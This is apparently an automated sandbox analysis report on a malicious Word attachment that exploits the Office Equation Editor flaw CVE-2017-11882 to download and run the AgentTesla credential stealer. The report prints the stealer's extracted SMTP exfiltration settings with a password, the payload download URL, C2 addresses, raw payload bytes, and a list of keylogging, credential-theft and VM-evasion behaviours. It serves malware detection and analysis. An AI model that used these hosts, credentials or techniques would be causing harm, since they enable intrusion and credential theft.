Loading ...

Play interactive tourEdit tour

Analysis Report Pending Orders Statement -40064778.doc

Overview

General Information

Sample Name:Pending Orders Statement -40064778.doc
Analysis ID:345163
MD5:47c45cbbc8fa7c9c62efdfcadee09e99
SHA1:e44f1f16be00551108ece175186d84ce6432a177
SHA256:1bb9591f1ed79d19e77dd9e9b0c05ee37aa36c317e93e1d275df2a801c05afe6
Tags:doc

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
.NET source code contains very large array initializations
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Installs a global keyboard hook
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1464 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2492 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • poiuytrewsdfghjklmnbvcx.exe (PID: 2572 cmdline: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe MD5: D0154FB70ABD786136AE9F68F285541C)
      • poiuytrewsdfghjklmnbvcx.exe (PID: 2332 cmdline: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe MD5: D0154FB70ABD786136AE9F68F285541C)
      • poiuytrewsdfghjklmnbvcx.exe (PID: 2712 cmdline: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe MD5: D0154FB70ABD786136AE9F68F285541C)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "6a5HVZW", "URL: ": "https://xWUrFiDn0aBmFXBFM.net", "To: ": "edubrazil4040@longjohn.icu", "ByHost: ": "mail.privateemail.com:587", "Password: ": "7piz2PrTT", "From: ": "edubrazil4040@longjohn.icu"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000006.00000002.2348944194.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000004.00000002.2107988603.0000000003C6A000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
              Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, CommandLine: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, NewProcessName: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, OriginalFileName: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, ProcessId: 2572
              Sigma detected: EQNEDT32.EXE connecting to internetShow sources
              Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 172.111.202.41, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2492, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
              Sigma detected: File Dropped By EQNEDT32EXEShow sources
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2492, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\boobov[1].exe

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: poiuytrewsdfghjklmnbvcx.exe.2712.6.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "6a5HVZW", "URL: ": "https://xWUrFiDn0aBmFXBFM.net", "To: ": "edubrazil4040@longjohn.icu", "ByHost: ": "mail.privateemail.com:587", "Password: ": "7piz2PrTT", "From: ": "edubrazil4040@longjohn.icu"}
              Multi AV Scanner detection for submitted fileShow sources
              Source: Pending Orders Statement -40064778.docVirustotal: Detection: 41%Perma Link
              Source: Pending Orders Statement -40064778.docReversingLabs: Detection: 47%

              Exploits:

              barindex
              Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeJump to behavior
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

              Compliance:

              barindex
              Uses new MSVCR DllsShow sources
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Binary contains paths to debug symbolsShow sources
              Source: Binary string: Symwriter.pdb source: poiuytrewsdfghjklmnbvcx.exe
              Source: Binary string: .soap.pdb source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000005.00000002.2101520069.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000000.2102067838.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe.2.dr
              Source: Binary string: Symwriter.pdb!CorSymWriter_SxS;..\v1.1.4322\diasymreader.dllI00000000-0000-0000-C000-000000000046 source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000005.00000002.2101520069.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000000.2102067838.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe.2.dr
              Source: global trafficDNS query: name: cy.kl-re.com
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.111.202.41:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.111.202.41:80

              Networking:

              barindex
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: https://xWUrFiDn0aBmFXBFM.net
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.54.122.60:587
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 27 Jan 2021 18:29:36 GMTContent-Type: application/x-msdownloadContent-Length: 246784Connection: keep-aliveLast-Modified: Tue, 26 Jan 2021 23:18:29 GMTX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Nginx-Upstream-Cache-Status: EXPIREDX-Server-Powered-By: EngintronAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 a3 10 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b6 03 00 00 0c 00 00 00 00 00 00 1e d4 03 00 00 20 00 00 00 e0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 ac d0 03 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 d3 03 00 57 00 00 00 00 e0 03 00 e8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 b4 03 00 00 20 00 00 00 b6 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 08 00 00 00 e0 03 00 00 0a 00 00 00 b8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 c2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 03 00 00 00 00 00 48 00 00 00 02 00 05 00 f4 2e 00 00 d0 a4 03 00 0b 00 02 00 04 00 00 06 00 00 00 00 00 00 00 00 50 20 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a ba 72 5c 91 00 70 28 4e 03 00 0a 80 01 00 00 04 73 8a 00 00 0a 80 02 00 00 04 72 60 91 00 70 80 03 00 00 04 73 4f 03 00 0a 80 04 00 00 04 2a a6 72 d3 93 00 70 19 8d 06 00 00 01 25 16 72 e7 93 00 70 a2 25 17 72 8b 93 00 70 a2 25 18 72 eb 93 00 70 a2 28 3c 02 00 0a 2a c6 72 ef 93 00 70 1a 8d 06 00 00 01 25 16 72 e7 93 00 70 a2 25 17 72 8f 93 00 70 a2 25 18 72 8b 93 00 70 a2 25 19 72 eb 93 00 70 a2 28 3c 02 00 0a 2a c6 72 ef 93 00 70 1a 8d 06 00 00 01 25 16 72
              Source: global trafficHTTP traffic detected: GET /base/9158412CBF14FB744AFA9F0D01F6CDF2.html HTTP/1.1Host: 193.239.147.103Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 193.239.147.103 193.239.147.103
              Source: Joe Sandbox ViewIP Address: 198.54.122.60 198.54.122.60
              Source: Joe Sandbox ViewASN Name: BLACKNIGHT-ASIE BLACKNIGHT-ASIE
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.54.122.60:587
              Source: global trafficHTTP traffic detected: GET //power/bo/boobov.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cy.kl-re.comConnection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D19B7C91-551E-40AF-9919-E039C2A6E74E}.tmpJump to behavior
              Source: global trafficHTTP traffic detected: GET //power/bo/boobov.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cy.kl-re.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /base/9158412CBF14FB744AFA9F0D01F6CDF2.html HTTP/1.1Host: 193.239.147.103Connection: Keep-Alive
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: unknownDNS traffic detected: queries for: cy.kl-re.com
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmpString found in binary or memory: http://193.239.147.103
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106510969.0000000000736000.00000004.00000020.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmpString found in binary or memory: http://193.239.147.103/base/9158412CBF14FB744AFA9F0D01F6CDF2.html
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358448912.0000000008426000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.comy
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349117316.00000000006E0000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
              Source: 77EC63BDA74BD0D0E0426DC8F8008506.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349067363.000000000066D000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabD
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349067363.000000000066D000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enD
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmpString found in binary or memory: http://duylfM.com
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmpString found in binary or memory: http://mail.privateemail.com
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2113733519.00000000056C0000.00000002.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2351747130.0000000005C50000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358077916.0000000008090000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2113733519.00000000056C0000.00000002.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2351747130.0000000005C50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.cr
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmpString found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.com/1
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpString found in binary or memory: http://www.wellsfargo.com/certpolicy0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/seccli/repository/CPS/
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: poiuytrewsdfghjklmnbvcx.exeString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
